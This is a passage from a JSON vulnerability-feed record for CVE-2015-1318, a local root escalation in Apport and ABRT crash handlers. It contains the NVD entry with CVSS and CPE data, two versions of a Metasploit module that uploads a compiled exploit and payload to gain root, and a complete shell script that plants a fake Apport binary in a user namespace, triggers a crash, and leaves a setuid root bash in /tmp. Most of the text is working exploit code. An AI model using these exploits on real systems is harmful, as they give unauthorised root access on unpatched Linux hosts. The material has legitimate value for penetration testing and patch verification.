'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [[ 'Auto', {} ]],\n 'References' =>\n [\n [ 'CVE', '2015-1318' ],\n [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],\n # Exploits\n [ 'EDB', '36782' ],\n [ 'EDB', '36746' ],\n [ 'URL', 'https://gist.github.com/taviso/0f02c255c13c5c113406' ],\n # ABRT (Fedora)\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],\n # Apport (Ubuntu)\n [ 'URL', 'https://usn.ubuntu.com/usn/USN-2569-1/' ],\n [ 'URL', 'https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893' ],\n [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758' ],\n [ 'URL', 'http://bazaar.launchpad.net/~apport-hackers/apport/trunk/revision/2943' ]\n ]\n ))\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n def base_dir\n datastore['WritableDir']\n end\n\n def check\n unless userns_enabled?\n vprint_error 'Unprivileged user namespaces are not permitted'\n return CheckCode::Safe\n end\n vprint_good 'Unprivileged user namespaces are permitted'\n\n kernel_version = Rex::Version.new kernel_release.split('-').first\n\n if kernel_version < Rex::Version.new('3.12')\n vprint_error \"Linux kernel version #{kernel_version} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"Linux kernel version #{kernel_version} is vulnerable\"\n\n kernel_core_pattern = read_file('/proc/sys/kernel/core_pattern').to_s\n\n # Vulnerable core_pattern (abrt):\n # kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e\n # Patched systems no longer preface the command with /usr/sbin/chroot\n # kernel.core_pattern = |/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e\n if kernel_core_pattern.include?('chroot') && kernel_core_pattern.include?('abrt-hook-ccpp')\n vprint_good 'System is configured to chroot ABRT for crash reporting'\n return CheckCode::Appears\n end\n\n # Vulnerable core_pattern (apport):\n # kernel.core_pattern = |/usr/share/apport/apport %p %s %c %P\n if kernel_core_pattern.include? 'apport'\n vprint_good 'System is configured to use Apport for crash reporting'\n\n unless command_exists?('apport-cli')\n return CheckCode::Detected('Could not determine Apport version. apport-cli is not installed or not in $PATH.')\n end\n\n res = cmd_exec('apport-cli --version').to_s\n\n if res.blank?\n return CheckCode::Detected('Could not determine Apport version')\n end\n\n apport_version = Rex::Version.new(res.split('-').first)\n\n # apport 2.13 < 2.17.1\n if apport_version.between?(Rex::Version.new('2.13'), Rex::Version.new('2.17'))\n vprint_good \"Apport version #{apport_version} is vulnerable\"\n return CheckCode::Appears\n end\n\n vprint_error \"Apport version #{apport_version} is not vulnerable\"\n\n return CheckCode::Safe\n end\n\n vprint_error 'System is not configured to use Apport or chroot ABRT for crash reporting'\n\n CheckCode::Safe\n end\n\n def upload_and_chmodx(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n chmod path\n register_file_for_cleanup path\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n # Upload Tavis Ormandy's newpid exploit:\n # - https://www.exploit-db.com/exploits/36746/\n # Cross-compiled with:\n # - i486-linux-musl-cc -static newpid.c\n executable_data = ::File.binread ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-1318', 'newpid'\n\n executable_name = \".#{rand_text_alphanumeric 5..10}\"\n executable_path = \"#{base_dir}/#{executable_name}\"\n upload_and_chmodx executable_path, executable_data\n\n # Upload payload executable\n payload_name = \".#{rand_text_alphanumeric 5..10}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n # newpid writes an 'exploit' directory\n # which must be removed manually if exploitation fails\n register_dir_for_cleanup \"#{base_dir}/exploit\"\n\n # Change working directory to base_dir,\n # allowing newpid to create the required hard links\n print_status 'Launching exploit...'\n output = cmd_exec \"cd #{base_dir}; echo '#{payload_path}&' | #{executable_path}\"\n output.each_line { |line| vprint_status line.chomp }\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/apport_abrt_chroot_priv_esc.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-02-09T02:33:08", "description": "The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1 allows local users to gain privileges via a crafted usr/share/apport/apport file in a namespace (container).", "cvss3": {}, "published": "2015-04-17T17:59:00", "type": "cve", "title": "CVE-2015-1318", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1318"], "modified": "2018-02-08T02:29:00", "cpe": ["cpe:/a:apport_project:apport:2.14.2", "cpe:/a:apport_project:apport:2.14", "cpe:/a:apport_project:apport:2.16.1", "cpe:/a:apport_project:apport:2.13.1", "cpe:/a:apport_project:apport:2.14.7", "cpe:/a:apport_project:apport:2.15", "cpe:/a:apport_project:apport:2.13.3", "cpe:/a:apport_project:apport:2.16", "cpe:/a:apport_project:apport:2.14.6", "cpe:/a:apport_project:apport:2.17", "cpe:/a:apport_project:apport:2.14.4", "cpe:/a:apport_project:apport:2.14.1", "cpe:/a:apport_project:apport:2.14.5", "cpe:/a:apport_project:apport:2.16.2", "cpe:/a:apport_project:apport:2.13.2", "cpe:/a:apport_project:apport:2.15.1", "cpe:/a:apport_project:apport:2.13", "cpe:/a:apport_project:apport:2.14.3"], "id": "CVE-2015-1318", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1318", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apport_project:apport:2.13:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.13.3:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.16:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.13.2:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.15:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.17:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.14:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.14.4:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.14.5:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.14.7:*:*:*:*:*:*:*", "cpe:2.3:a:apport_project:apport:2.14.6:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-16T08:15:22", "description": "", "cvss3": {}, "published": "2018-02-05T00:00:00", "type": "exploitdb", "title": "Apport/ABRT - &#039;chroot&#039; Local Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2015-1318", "CVE-2015-1318"], "modified": "2018-02-05T00:00:00", "id": "EDB-ID:43971", "href": "https://www.exploit-db.com/exploits/43971", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apport / ABRT chroot Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges on Linux systems by\r\n invoking the default coredump handler inside a namespace (\"container\").\r\n\r\n Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are\r\n vulnerable, due to a feature which allows forwarding reports to\r\n a container's Apport by changing the root directory before loading\r\n the crash report, causing 'usr/share/apport/apport' within the crashed\r\n task's directory to be executed.\r\n\r\n Similarly, Fedora is vulnerable when the kernel crash handler is\r\n configured to change root directory before executing ABRT, causing\r\n 'usr/libexec/abrt-hook-ccpp' within the crashed task's directory to be\r\n executed.\r\n\r\n In both instances, the crash handler does not drop privileges,\r\n resulting in code execution as root.\r\n\r\n This module has been tested successfully on Apport 2.14.1 on\r\n Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'St\u00e9phane Graber', # Independent discovery, PoC and patch\r\n 'Tavis Ormandy', # Independent discovery and C exploit\r\n 'Ricardo F. Teixeira', # shell exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Mar 31 2015',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-1318' ],\r\n [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],\r\n # Exploits\r\n [ 'EDB', '36782' ],\r\n [ 'EDB', '36746' ],\r\n [ 'URL', 'https://gist.github.com/taviso/0f02c255c13c5c113406' ],\r\n # ABRT (Fedora)\r\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],\r\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],\r\n # Apport (Ubuntu)\r\n [ 'URL', 'https://usn.ubuntu.com/usn/USN-2569-1/' ],\r\n [ 'URL', 'https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893' ],\r\n [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758' ],\r\n [ 'URL', 'http://bazaar.launchpad.net/~apport-hackers/apport/trunk/revision/2943' ]\r\n ]\r\n ))\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ])\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir']\r\n end\r\n\r\n def check\r\n kernel_version = Gem::Version.new cmd_exec('uname -r').split('-').first\r\n\r\n if kernel_version < Gem::Version.new('3.12')\r\n vprint_error \"Linux kernel version #{kernel_version} is NOT vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n\r\n vprint_good \"Linux kernel version #{kernel_version} is vulnerable\"\r\n\r\n kernel_core_pattern = cmd_exec 'cat /proc/sys/kernel/core_pattern'\r\n\r\n # Vulnerable core_pattern (abrt):\r\n # kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e\r\n # Patched systems no longer preface the command with /usr/sbin/chroot\r\n # kernel.core_pattern = |/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e\r\n if kernel_core_pattern.include?('chroot') && kernel_core_pattern.include?('abrt-hook-ccpp')\r\n vprint_good 'System is configured to chroot ABRT for crash reporting'\r\n return CheckCode::Vulnerable\r\n end\r\n\r\n # Vulnerable core_pattern (apport):\r\n # kernel.core_pattern = |/usr/share/apport/apport %p %s %c %P\r\n if kernel_core_pattern.include? 'apport'\r\n vprint_good 'System is configured to use Apport for crash reporting'\r\n\r\n res = cmd_exec 'apport-cli --version'\r\n\r\n if res.blank?\r\n vprint_error 'Apport is NOT installed'\r\n return CheckCode::Safe\r\n end\r\n\r\n apport_version = Gem::Version.new(res.split('-').first)\r\n\r\n if apport_version >= Gem::Version.new('2.13') && apport_version < Gem::Version.new('2.17.1')\r\n vprint_good \"Apport version #{apport_version} is vulnerable\"\r\n return CheckCode::Vulnerable\r\n end\r\n\r\n vprint_error \"Apport version #{apport_version} is NOT vulnerable\"\r\n\r\n return CheckCode::Safe\r\n end\r\n\r\n vprint_error 'System is NOT configured to use Apport or chroot ABRT for crash reporting'\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n register_file_for_cleanup path\r\n end\r\n\r\n def exploit\r\n if check != CheckCode::Vulnerable\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n\r\n # Upload Tavis Ormandy's newpid exploit:\r\n # - https://www.exploit-db.com/exploits/36746/\r\n # Cross-compiled with:\r\n # - i486-linux-musl-cc -static newpid.c\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-1318', 'newpid'\r\n fd = ::File.open path, 'rb'\r\n executable_data = fd.read fd.stat.size\r\n fd.close\r\n\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n upload_and_chmodx executable_path, executable_data\r\n\r\n # Upload payload executable\r\n payload_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n payload_path = \"#{base_dir}/#{payload_name}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # newpid writes an 'exploit' directory\r\n # which must be removed manually if exploitation fails\r\n register_dir_for_cleanup \"#{base_dir}/exploit\"\r\n\r\n # Change working directory to base_dir,\r\n # allowing newpid to create the required hard links\r\n cmd_exec \"cd '#{base_dir}'\"\r\n\r\n print_status 'Launching exploit...'\r\n output = cmd_exec executable_path\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n # Check for root privileges\r\n id = cmd_exec 'id'\r\n\r\n unless id.include? 'root'\r\n fail_with Failure::Unknown, 'Failed to gain root privileges'\r\n end\r\n\r\n print_good 'Upgraded session to root privileges'\r\n vprint_line id\r\n\r\n # Execute payload executable\r\n vprint_status 'Executing payload...'\r\n cmd_exec payload_path\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/43971", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T08:24:22", "description": "", "cvss3": {}, "published": "2015-04-17T00:00:00", "type": "exploitdb", "title": "Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2015-1318", "CVE-2015-1318"], "modified": "2015-04-17T00:00:00", "id": "EDB-ID:36782", "href": "https://www.exploit-db.com/exploits/36782", "sourceData": "#!/bin/sh\r\n#\r\n# CVE-2015-1318\r\n# \r\n# Reference: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758\r\n# \r\n# Example:\r\n#\r\n# % uname -a\r\n# Linux maggie 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux\r\n#\r\n# % lsb_release -a\r\n# No LSB modules are available.\r\n# Distributor ID: Ubuntu\r\n# Description: Ubuntu 14.04.2 LTS\r\n# Release: 14.04\r\n# Codename: trusty\r\n#\r\n# % dpkg -l | grep '^ii apport ' | awk -F ' ' '{ print $2 \" \" $3 }'\r\n# apport 2.14.1-0ubuntu3.8\r\n#\r\n# % id\r\n# uid=1000(ricardo) gid=1000(ricardo) groups=1000(ricardo) (...)\r\n#\r\n# % ./apport.sh\r\n# pwned-4.3# id\r\n# uid=1000(ricardo) gid=1000(ricardo) euid=0(root) groups=0(root) (...)\r\n# pwned-4.3# exit\r\n\r\nTEMPDIR=$(mktemp -d)\r\n\r\ncd ${TEMPDIR}\r\n\r\ncp /bin/busybox .\r\n\r\nmkdir -p dev mnt usr/share/apport\r\n\r\n(\r\ncat << EOF\r\n#!/busybox sh\r\n(\r\ncp /mnt/1/root/bin/bash /mnt/1/root/tmp/pwned\r\nchmod 5755 /mnt/1/root/tmp/pwned\r\n) \r\nEOF\r\n\r\n) > usr/share/apport/apport\r\n\r\nchmod +x usr/share/apport/apport\r\n\r\n(\r\ncat << EOF\r\nmount -o bind . .\r\ncd .\r\nmount --rbind /proc mnt\r\ntouch dev/null\r\npivot_root . .\r\n./busybox sleep 500 &\r\nSLEEP=\\$!\r\n./busybox sleep 1\r\n./busybox kill -11 \\$SLEEP\r\n./busybox sleep 5\r\nEOF\r\n) | lxc-usernsexec -m u:0:$(id -u):1 -m g:0:$(id -g):1 2>&1 >/dev/null -- \\\r\n lxc-unshare -s \"MOUNT|PID|NETWORK|UTSNAME|IPC\" -- /bin/sh 2>&1 >/dev/null\r\n\r\n/tmp/pwned -p\r\n\r\nrm -Rf ${TEMPDIR}", "sourceHref": "https://www.exploit-db.com/download/36782", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}